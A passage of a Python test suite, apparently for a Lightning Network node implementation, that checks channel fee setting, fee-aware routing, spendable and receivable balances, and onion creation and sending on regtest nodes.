DEF_BASE_MSAT = Millisatoshi(DEF_BASE)
DEF_PPM = 100
l1, l2, l3 = node_factory.get_nodes(3,
opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
node_factory.join_nodes([l1, l2])
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
def channel_get_fees(scid):
return l1.db.query(
'SELECT feerate_base, feerate_ppm FROM channels '
'WHERE short_channel_id=\'{}\';'.format(scid))
# get short channel id
scid = l1.get_channel_scid(l2)
# feerates should be init with global config
db_fees = l1.db_query('SELECT feerate_base, feerate_ppm FROM channels;')
assert(db_fees[0]['feerate_base'] == DEF_BASE)
assert(db_fees[0]['feerate_ppm'] == DEF_PPM)
# this is also what listpeers should return
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == DEF_BASE_MSAT
assert peers[0]['channels'][0]['fee_proportional_millionths'] == DEF_PPM
# custom setchannelfee scid <base> <ppm>
result = l1.rpc.setchannelfee(scid, 1337, 137)
# check result format
assert(result['base'] == 1337)
assert(result['ppm'] == 137)
assert(len(result['channels']) == 1)
assert(re.match('^[0-9a-f]{64}$', result['channels'][0]['channel_id']))
assert(result['channels'][0]['peer_id'] == l2.info['id'])
assert(result['channels'][0]['short_channel_id'] == scid)
# check if custom values made it into the database
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 1337)
assert(db_fees[0]['feerate_ppm'] == 137)
# also check for updated values in `listpeers`
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == Millisatoshi(1337)
assert peers[0]['channels'][0]['fee_proportional_millionths'] == 137
# wait for gossip and check if l1 sees new fees in listchannels
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_BASE, 1337])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_PPM, 137])
# also test with named and missing parameters
result = l1.rpc.setchannelfee(ppm=42, id=scid)
assert(result['base'] == DEF_BASE)
assert(result['ppm'] == 42)
assert(len(result['channels']) == 1)
assert(re.match('^[0-9a-f]{64}$', result['channels'][0]['channel_id']))
assert(result['channels'][0]['short_channel_id'] == scid)
result = l1.rpc.setchannelfee(base=42, id=scid)
assert(result['base'] == 42)
assert(result['ppm'] == DEF_PPM)
assert(len(result['channels']) == 1)
assert(re.match('^[0-9a-f]{64}$', result['channels'][0]['channel_id']))
assert(result['channels'][0]['short_channel_id'] == scid)
# check if negative fees raise error and DB keeps values
# JSONRPC2_INVALID_PARAMS := -32602
with pytest.raises(RpcError, match=r'-32602'):
l1.rpc.setchannelfee(scid, -1, -1)
# test if zero fees is possible
result = l1.rpc.setchannelfee(scid, 0, 0)
assert(result['base'] == 0)
assert(result['ppm'] == 0)
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 0)
assert(db_fees[0]['feerate_ppm'] == 0)
# also check for updated values in `listpeers`
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == Millisatoshi(0)
assert peers[0]['channels'][0]['fee_proportional_millionths'] == 0
# disable and check for global values to be returned
result = l1.rpc.setchannelfee(scid)
assert(result['base'] == DEF_BASE)
assert(result['ppm'] == DEF_PPM)
# check default values in DB
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == DEF_BASE)
assert(db_fees[0]['feerate_ppm'] == DEF_PPM)
# also check for updated values in `listpeers`
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == DEF_BASE_MSAT
assert peers[0]['channels'][0]['fee_proportional_millionths'] == DEF_PPM
# check also peer id can be used
result = l1.rpc.setchannelfee(l2.info['id'], 42, 43)
assert(result['base'] == 42)
assert(result['ppm'] == 43)
assert(len(result['channels']) == 1)
assert(result['channels'][0]['peer_id'] == l2.info['id'])
assert(result['channels'][0]['short_channel_id'] == scid)
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 42)
assert(db_fees[0]['feerate_ppm'] == 43)
# check if invalid scid raises proper error
with pytest.raises(RpcError, match=r'-1.*Could not find active channel of peer with that id'):
result = l1.rpc.setchannelfee(l3.info['id'], 42, 43)
with pytest.raises(RpcError, match=r'-32602.*id: should be a channel ID or short channel ID: invalid token'):
result = l1.rpc.setchannelfee('f42' + scid[3:], 42, 43)
# check if 'base' unit can be modified to satoshi
result = l1.rpc.setchannelfee(scid, '1sat')
assert(result['base'] == 1000)
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 1000)
# check if 'ppm' values greater than u32_max fail
with pytest.raises(RpcError, match=r'-32602.*ppm: should be an integer: invalid token'):
l1.rpc.setchannelfee(scid, 0, 2**32)
# check if 'base' values greater than u32_max fail
with pytest.raises(RpcError, match=r'-32602.*base: exceeds u32 max: invalid token'):
l1.rpc.setchannelfee(scid, 2**32)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_state(node_factory, bitcoind):
# TEST SETUP
#
# [l0] --> [l1] --> [l2]
#
# Initiate channel [l1,l2] and try to set feerates other states than
# CHANNELD_NORMAL or CHANNELD_AWAITING_LOCKIN. Should raise error.
# Use l0 to make a forward through l1/l2 for testing.
DEF_BASE = 0
DEF_PPM = 0
l0, l1, l2 = node_factory.get_nodes(3, opts={
'fee-base': DEF_BASE,
'fee-per-satoshi': DEF_PPM
})
# connection and funding
l0.rpc.connect(l1.info['id'], 'localhost', l1.port)
l0.fundchannel(l1, 1000000, wait_for_active=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
scid, _ = l1.fundchannel(l2, 1000000, wait_for_active=False)
# try setting the fee in state AWAITING_LOCKIN should be possible
# assert(l1.channel_state(l2) == "CHANNELD_AWAITING_LOCKIN")
result = l1.rpc.setchannelfee(l2.info['id'], 42, 0)
assert(result['channels'][0]['peer_id'] == l2.info['id'])
# cid = result['channels'][0]['channel_id']
# test routing correct new fees once routing is established
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l0, l1, l2])
l0.wait_for_route(l2)
inv = l2.rpc.invoice(100000, 'test_setchannelfee_state', 'desc')['bolt11']
result = l0.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 100042
# Disconnect and unilaterally close from l2 to l1
l2.rpc.disconnect(l1.info['id'], force=True)
l1.rpc.disconnect(l2.info['id'], force=True)
result = l2.rpc.close(scid, 1)
assert result['type'] == 'unilateral'
# wait for l1 to see unilateral close via bitcoin network
while l1.channel_state(l2) == "CHANNELD_NORMAL":
bitcoind.generate_block(1)
# assert l1.channel_state(l2) == "FUNDING_SPEND_SEEN"
# Try to setchannelfee in order to raise expected error.
# To reduce false positive flakes, only test if state is not NORMAL anymore.
with pytest.raises(RpcError, match=r'-1.*'):
# l1.rpc.setchannelfee(l2.info['id'], 10, 1)
l1.rpc.setchannelfee(l2.info['id'], 10, 1)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_routing(node_factory, bitcoind):
# TEST SETUP
#
# [l1] <--default_fees--> [l2] <--specific_fees--> [l3]
#
# - json listchannels is able to see the new values in foreign node
# - routing calculates fees correctly
# - payment can be done using specific fees
# - channel specific fees can be disabled again
# - payment can be done using global fees
DEF_BASE = 1
DEF_PPM = 10
l1, l2, l3 = node_factory.line_graph(
3, announce_channels=True, wait_for_announce=True,
opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
# get short channel id for 2->3
scid = l2.get_channel_scid(l3)
# TEST CUSTOM VALUES
l2.rpc.setchannelfee(scid, 1337, 137)
# wait for l1 to see updated channel via gossip
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [1337, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [137, DEF_PPM])
# test fees are applied to HTLC forwards
#
# BOLT #7:
# If l1 were to send 4,999,999 millisatoshi to l3 via l2, it needs to
# pay l2 the fee it specified in the l2->l3 `channel_update`, calculated as
# per [HTLC Fees](#htlc_fees): base + amt * pm / 10**6
#
# 1337 + 4999999 * 137 / 1000000 = 2021.999 (2021)
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5002020
assert route[1]['msatoshi'] == 4999999
# In case l3 includes a routehint, we need to make sure they also know
# about the new fees, otherwise we may end up with the old feerate
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid)['channels']] == [(1337, 137, True), (DEF_BASE, DEF_PPM, True)])
# do and check actual payment
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_1', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 5002020
# TEST DISABLE and check global fee routing
l2.rpc.setchannelfee(scid)
# wait for l1 to see default values again via gossip
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_BASE, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_PPM, DEF_PPM])
# test if global fees are applied again (base 1 ppm 10)
# 1 + 4999999 * 10 / 1000000 = 50.999 (50)
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5000049
assert route[1]['msatoshi'] == 4999999
# In case l3 includes a routehint, we need to make sure they also know
# about the new fees, otherwise we may end up with the old feerate
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid)['channels']] == [(DEF_BASE, DEF_PPM, True), (DEF_BASE, DEF_PPM, True)])
# do and check actual payment
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_2', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 5000049
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_zero(node_factory, bitcoind):
# TEST SETUP
#
# [l1] <--default_fees--> [l2] <--specific_fees--> [l3]
#
# - json listchannels is able to see the new values in foreign node
# - routing calculates fees correctly
# - payment can be done using zero fees
DEF_BASE = 1
DEF_PPM = 10
l1, l2, l3 = node_factory.line_graph(
3, announce_channels=True, wait_for_announce=True,
opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
# get short channel id for 2->3
scid = l2.get_channel_scid(l3)
# TEST ZERO fees possible
l2.rpc.setchannelfee(scid, 0, 0)
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [0, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [0, DEF_PPM])
# test if zero fees are applied
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 4999999
assert route[1]['msatoshi'] == 4999999
# Wait for l3 to know about our low-balling, otherwise they'll add a wrong
# routehint to the invoice.
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid)['channels']] == [(0, 0, True), (DEF_BASE, DEF_PPM, True)])
# do and check actual payment
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_3', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 4999999
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_restart(node_factory, bitcoind):
# TEST SETUP
#
# [l1] <--default_fees--> [l2] <--specific_fees--> [l3]
#
# - l2 sets fees to custom values and restarts
# - l1 routing can be made with the custom fees
# - l2 sets fees to UIN32_MAX (db update default) and restarts
# - l1 routing can be made to l3 and global (1 10) fees are applied
DEF_BASE = 1
DEF_PPM = 10
OPTS = {'may_reconnect': True, 'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM}
l1, l2, l3 = node_factory.line_graph(3, announce_channels=True, wait_for_announce=True, opts=OPTS)
# get short channel idS
scid12 = l1.get_channel_scid(l2)
scid23 = l2.get_channel_scid(l3)
# l2 set custom fees
l2.rpc.setchannelfee(scid23, 1337, 137)
# restart l2 and reconnect
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
# Make sure l1's gossipd registered channeld activating channel.
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(scid12)['channels']] == [True, True])
# l1 wait for channel update from l2
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l1.rpc.listchannels(scid23)['channels']] == [(1337, 137, True), (DEF_BASE, DEF_PPM, True)])
# In case l3 includes a routehint, we need to make sure they also know
# about the new fees, otherwise we may end up with the old feerate
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid23)['channels']] == [(1337, 137, True), (DEF_BASE, DEF_PPM, True)])
# l1 can make payment to l3 with custom fees being applied
# Note: BOLT #7 math works out to 2021 msat fees
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_1', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 5002020
@pytest.mark.developer("updates are delayed without --dev-fast-gossip")
def test_setchannelfee_all(node_factory, bitcoind):
# TEST SETUP
#
# [l1]----> [l2]
# |
# o-----> [l3]
DEF_BASE = 10
DEF_PPM = 100
l1, l2, l3 = node_factory.get_nodes(3, opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.fundchannel(l2, 1000000)
l1.fundchannel(l3, 1000000)
# get short channel id
scid2 = l1.get_channel_scid(l2)
scid3 = l1.get_channel_scid(l3)
# now try to set all (two) channels using wildcard syntax
result = l1.rpc.setchannelfee("all", 0xDEAD, 0xBEEF)
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid2)['channels']] == [DEF_BASE, 0xDEAD])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid2)['channels']] == [DEF_PPM, 0xBEEF])
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid3)['channels']] == [0xDEAD, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid3)['channels']] == [0xBEEF, DEF_PPM])
assert len(result['channels']) == 2
assert result['base'] == 0xDEAD
assert result['ppm'] == 0xBEEF
assert result['channels'][0]['peer_id'] == l2.info['id']
assert result['channels'][0]['short_channel_id'] == scid2
assert result['channels'][1]['peer_id'] == l3.info['id']
assert result['channels'][1]['short_channel_id'] == scid3
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_channel_spendable(node_factory, bitcoind):
"""Test that spendable_msat is accurate"""
sats = 10**6
l1, l2 = node_factory.line_graph(2, fundamount=sats, wait_for_announce=True,
opts={'plugin': os.path.join(os.getcwd(), 'tests/plugins/hold_invoice.py'), 'holdtime': '30'})
payment_hash = l2.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
# We should be able to spend this much, and not one msat more!
amount = l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat']
route = l1.rpc.getroute(l2.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l1.rpc.getroute(l2.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l1.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'] == Millisatoshi(0)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Make sure l2 thinks it's all over.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 0)
# Now, reverse should work similarly.
payment_hash = l1.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
amount = l2.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat']
# Turns out we won't route this, as it's over max - reserve:
route = l2.rpc.getroute(l1.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l2.rpc.getroute(l1.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l2.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'] == Millisatoshi(0)
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_channel_receivable(node_factory, bitcoind):
"""Test that receivable_msat is accurate"""
sats = 10**6
l1, l2 = node_factory.line_graph(2, fundamount=sats, wait_for_announce=True,
opts={'plugin': os.path.join(os.getcwd(), 'tests/plugins/hold_invoice.py'), 'holdtime': '30'})
payment_hash = l2.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
# We should be able to receive this much, and not one msat more!
amount = l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat']
route = l1.rpc.getroute(l2.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l1.rpc.getroute(l2.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat'] == Millisatoshi(0)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Make sure l2 thinks it's all over.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 0)
# Now, reverse should work similarly.
payment_hash = l1.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
amount = l1.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat']
# Turns out we won't route this, as it's over max - reserve:
route = l2.rpc.getroute(l1.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l2.rpc.getroute(l1.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l1.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l1.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat'] == Millisatoshi(0)
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_channel_spendable_large(node_factory, bitcoind):
"""Test that spendable_msat is accurate for large channels"""
# This is almost the max allowable spend.
sats = 4294967
l1, l2 = node_factory.line_graph(
2,
fundamount=sats,
wait_for_announce=True,
opts={
'plugin': os.path.join(os.getcwd(), 'tests/plugins/hold_invoice.py'),
'holdtime': '30'
}
)
payment_hash = l2.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
# We should be able to spend this much, and not one msat more!
spendable = l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat']
# receivable from the other side should calculate to the exact same amount
receivable = l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat']
assert spendable == receivable
# route or waitsendpay fill fail.
with pytest.raises(RpcError):
route = l1.rpc.getroute(l2.info['id'], spendable + 1, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l1.rpc.getroute(l2.info['id'], spendable, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
def test_channel_spendable_receivable_capped(node_factory, bitcoind):
"""Test that spendable_msat and receivable_msat is capped at 2^32-1"""
sats = 16777215
l1, l2 = node_factory.line_graph(2, fundamount=sats, wait_for_announce=False)
assert l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'] == Millisatoshi(0xFFFFFFFF)
assert l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat'] == Millisatoshi(0xFFFFFFFF)
@unittest.skipIf(True, "Test is extremely flaky")
@unittest.skipIf(not DEVELOPER and VALGRIND, "Doesn't raise exception, needs better sync")
def test_lockup_drain(node_factory, bitcoind):
"""Try to get channel into a state where opener can't afford fees on additional HTLC, so peer can't add HTLC"""
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
# l1 sends all the money to l2 until even 1 msat can't get through.
total = l1.drain(l2)
# Even if feerate now increases 2x (30000), l2 should be able to send
# non-dust HTLC to l1.
l1.force_feerates(30000)
l2.pay(l1, total // 2)
# reset fees and send all back again
l1.force_feerates(15000)
l1.drain(l2)
# But if feerate increase just a little more, l2 should not be able to send
# non-fust HTLC to l1
l1.force_feerates(30002) # TODO: Why does 30001 fail? off by one in C code?
wait_for(lambda: l1.rpc.listpeers()['peers'][0]['connected'])
with pytest.raises(RpcError, match=r".*Capacity exceeded.*"):
l2.pay(l1, total // 2)
def test_error_returns_blockheight(node_factory, bitcoind):
"""Test that incorrect_or_unknown_payment_details returns block height"""
l1, l2 = node_factory.line_graph(2)
l1.rpc.sendpay([{'msatoshi': 100,
'id': l2.info['id'],
'delay': 10,
'channel': l1.get_channel_scid(l2)}],
'00' * 32)
with pytest.raises(RpcError, match=r"INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS.*'erring_index': 1") as err:
l1.rpc.waitsendpay('00' * 32, TIMEOUT)
# BOLT #4:
# 1. type: PERM|15 (`incorrect_or_unknown_payment_details`)
# 2. data:
# * [`u64`:`htlc_msat`]
# * [`u32`:`height`]
assert (err.value.error['data']['raw_message']
== '400f{:016x}{:08x}'.format(100, bitcoind.rpc.getblockcount()))
@pytest.mark.developer('Needs dev-routes')
def test_tlv_or_legacy(node_factory, bitcoind):
l1, l2, l3 = node_factory.line_graph(3,
opts={'plugin': os.path.join(os.getcwd(), 'tests/plugins/print_htlc_onion.py')})
scid12 = l1.get_channel_scid(l2)
scid23 = l2.get_channel_scid(l3)
# We need to force l3 to provide route hint from l2 (it won't normally,
# since it sees l2 as a dead end).
inv = l3.rpc.call('invoice', {"msatoshi": 10000,
"label": "test_tlv1",
"description": "test_tlv1",
"dev-routes": [[{'id': l2.info['id'],
'short_channel_id': scid23,
'fee_base_msat': 1,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6}]]})['bolt11']
l1.rpc.pay(inv)
# Since L1 hasn't seen broadcast, it doesn't know L2 is TLV, but invoice tells it about L3
l2.daemon.wait_for_log("Got onion.*'type': 'legacy'")
l3.daemon.wait_for_log("Got onion.*'type': 'tlv'")
# We need 5 more blocks to announce l1->l2 channel.
bitcoind.generate_block(5)
# Make sure l1 knows about l2
wait_for(lambda: 'alias' in l1.rpc.listnodes(l2.info['id'])['nodes'][0])
# Make sure l3 knows about l1->l2, so it will add route hint now.
wait_for(lambda: len(l3.rpc.listchannels(scid12)['channels']) > 0)
# Now it should send TLV to l2.
inv = l3.rpc.invoice(10000, "test_tlv2", "test_tlv2")['bolt11']
l1.rpc.pay(inv)
l2.daemon.wait_for_log("Got onion.*'type': 'tlv'")
l3.daemon.wait_for_log("Got onion.*'type': 'tlv'")
@pytest.mark.developer('Needs dev-routes')
@unittest.skipIf(TEST_NETWORK != 'regtest', "Invoice is network specific")
def test_pay_no_secret(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, wait_for_announce=True)
l2.rpc.invoice(100000, "test_pay_no_secret", "test_pay_no_secret",
preimage='00' * 32, expiry=2000000000)
# Produced from modified version (different secret!).
inv_badsecret = 'lnbcrt1u1pwuedm6pp5ve584t0cv27hwmy0cx9ca8uwyqyfw9y9dm3r8vus9fv36r2l9yjsdqaw3jhxazlwpshjhmwda0hxetrwfjhgxq8pmnt9qqcqp9sp52au0npwmw4xxv2rfrat04kh9p3jlmklgavhfxqukx0l05pw5tccs9qypqsqa286dmt2xh3jy8cd8ndeyr845q8a7nhgjkerdqjns76jraux6j25ddx9f5k5r2ey0kk942x3uhaff66794kyjxxcd48uevf7p6ja53gqjj5ur7'
with pytest.raises(RpcError, match=r"INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS.*'erring_index': 1"):
l1.rpc.pay(inv_badsecret)
# Produced from old version (no secret!)
inv_nosecret = 'lnbcrt1u1pwue4vapp5ve584t0cv27hwmy0cx9ca8uwyqyfw9y9dm3r8vus9fv36r2l9yjsdqaw3jhxazlwpshjhmwda0hxetrwfjhgxq8pmnt9qqcqp9570xsjyykvssa6ty8fjth6f2y8h09myngad9utesttwjwclv95fz3lgd402f9e5yzpnxmkypg55rkvpg522gcz4ymsjl2w3m4jhw4jsp55m7tl'
# This succeeds until we make secrets compulsory.
l1.rpc.pay(inv_nosecret)
l2.daemon.wait_for_log(r'HTLC set contains 1 HTLCs, for a total of 100000msat out of 100000msat \(no payment_secret\)')
@flaky
def test_shadow_routing(node_factory):
"""
Test the value randomization through shadow routing
Since there is a very low (0.5**10) probability that it fails we mark it
as flaky.
"""
# We need l3 for random walk
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
amount = 10000
total_amount = 0
n_payments = 10
for i in range(n_payments):
inv = l3.rpc.invoice(amount, "{}".format(i), "test")["bolt11"]
total_amount += l1.rpc.pay(inv)["amount_sent_msat"]
assert total_amount.millisatoshis > n_payments * amount
# Test that the added amount isn't absurd
assert total_amount.millisatoshis < (n_payments * amount) * (1 + 0.01)
# FIXME: Test cltv delta too ?
def test_createonion_rpc(node_factory):
l1 = node_factory.get_node()
hops = [{
"pubkey": "02eec7245d6b7d2ccb30380bfbe2a3648cd7a942653f5aa340edcea1f283686619",
# legacy
"payload": "000000000000000000000000000000000000000000000000000000000000000000"
}, {
"pubkey": "0324653eac434488002cc06bbfb7f10fe18991e35f9fe4302dbea6d2353dc0ab1c",
# tlv (20 bytes)
"payload": "140101010101010101000000000000000100000001"
}, {
"pubkey": "027f31ebc5462c1fdce1b737ecff52d37d75dea43ce11c74d25aa297165faa2007",
# TLV (256 bytes)
"payload": "fd0100000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff"
}, {
"pubkey": "032c0b7cf95324a07d05398b240174dc0c2be444d96b159aa6c7f7b1e668680991",
# tlv (20 bytes)
"payload": "140303030303030303000000000000000300000003"
}, {
"pubkey": "02edabbd16b41c8371b92ef2f04c1185b4f03b6dcd52ba9b78d9d7c89c8f221145",
# legacy
"payload": "000404040404040404000000000000000400000004000000000000000000000000"
}]
res = l1.rpc.createonion(hops=hops, assocdata="BB" * 32)
assert(len(res['onion']) == 2 * 1366)
assert(len(res['shared_secrets']) == len(hops))
res = l1.rpc.createonion(hops=hops, assocdata="42" * 32,
session_key="41" * 32)
# The trailer is generated using the filler and can be ued as a
# checksum. This trailer is from the test-vector in the specs.
print(res)
assert(res['onion'].endswith('9400f45a48e6dc8ddbaeb3'))
@pytest.mark.developer("gossip propagation is slow without DEVELOPER=1")
def test_sendonion_rpc(node_factory):
l1, l2, l3, l4 = node_factory.line_graph(4, wait_for_announce=True)
amt = 10**3
route = l1.rpc.getroute(l4.info['id'], 10**3, 10)['route']
inv = l4.rpc.invoice(amt, "lbl", "desc")
first_hop = route[0]
blockheight = l1.rpc.getinfo()['blockheight']
def serialize_payload(n):
block, tx, out = n['channel'].split('x')
payload = hexlify(struct.pack(
"!BQQL",
0,
int(block) << 40 | int(tx) << 16 | int(out),
int(n['amount_msat']),
blockheight + n['delay'])).decode('ASCII')
payload += "00" * 12
return payload
# Need to shift the parameters by one hop
hops = []
